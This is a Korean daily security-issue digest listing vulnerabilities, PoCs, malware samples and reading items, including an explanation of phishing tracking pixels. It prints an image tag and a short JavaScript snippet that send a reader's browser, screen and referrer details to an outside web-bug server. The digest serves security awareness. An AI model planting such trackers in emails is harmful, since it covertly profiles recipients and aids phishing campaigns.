일일 보안이슈
NSA 공개 해킹 툴, Eternalromance 툴 분석
VirtualBox: virtio-net 를 통한 guest-to-host out-of-bounds 쓰기
가상 virtio 네트워크 어댑터(기본설정 아님)를 사용한 VBox VM 이 노출. 게스트 커널이 trusted userland host process에 데이터를 쓸 수 있는 취약점. CVE-2017-3575. POC
VLC Media Player 2.2.3, DecodeAdpcmImaQT BOF
MS Windows taskschd.msc Local SYSTEM Priv Escalation
WordPress Theme, ‘boldial’ FPD
FPD (Full Path Disclosure) 는 공격자가 webroot 까지의 전체 경로를 볼 수 있는 취약점. www.mysite.com/index.html 의 실제 PC경로가 /home/myaccount/htdocs/file/index.html 라고 할 때 이 경로가 노출되는 취약점 POC
Bart Ransomeware 복호화도구 출시
Dridex Malspam 관련 트래픽, 샘플, 워드문서
읽을거리
Cylance Battles Malware Testing Industry
Cylance 는 머신러닝 기반의 AV 제품 업체, 기존의 패턴기반 AV 제품(Legacy AV) 업체간의 적대감이 다시 나타났다. 논점은 머신러닝 기반의 AV 는 아직 테스트 중이라는 것… 기사원문
피싱 캠페인에 활용되는 Pixel Tracker
Tracking Pixels 혹은 Pixel Tracker 라 불리는 기술은 피싱활동에서 많이 이용된다. 원리는, 이메일이나 기타 HTML 지원 형식에 1×1 크기의 눈에 띄지 않는(혹은 배경색과 같은) 이미지를 삽입하는데, 이 이미지는 피싱 공격자 자신의 웹서버에 있어, 이메일을 열 때 공격자 웹서버의 이미지를 가져가는것으로 누가 언제 어떤 이메일을 조회했는지 알아내는 기법. 활용된진 이미 오래된 기술. 예를들면 아래와 같다.
이메일에 아래와 같은 내용을 삽입한다. 여기서 tux.irongeek.com/cgi-bin/webbug.cgi 는 공격자가 미리 마련해둔 웹서버, some-extra-stuff 는 이메일을 연 대상의 정보를 수집하는 자바스크립트 정도가 될 수 있다.
<img src="http://tux.irongeek.com/cgi-bin/webbug.cgi?some-extra-stuff">
예를 들어 위의 태그를 생성하는데 아래와같은 자바스크립트를 사용한다면, 공격자는
adc,Netscape,1024x768,true,32,32,,192.168.170.55,Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007,http://irongeek.com/bugtest/index.php,Wed Oct 13 20:06:09 EDT 2004 와 같은, 이메일을 연 사람에 대한 더 자세한 정보를 알게 될 것이다.
<script language="javascript"
type="text/javascript">
<!--
document.write("<img width=0 height=0 src=\"http://tux.irongeek.com/webbug.php?adc,"
+unescape(navigator.appName)
+","+screen.width+"x"+screen.height
+","+navigator.javaEnabled()
+","+screen.pixelDepth
+","+screen.colorDepth+","
+escape(document.referrer)+"\">");
// -->
</script>
여기서 더 자세한 내용을 확인할 수 있다. POC는 여기
OS X KERNEL EXPLOIT 기초 (OS X 10.12 SIERRA)
테스트용 MS Office 문서 다운로드 방법
Firefox 53 릴리즈
XP, Vista 지원 중단, 새로운 테마(light, dark) 지원, 크롬과 비슷한 인터페이스의 인증서 확인창. 기사원문
드론 hijacking 에 필요한 시간, 11 millisec
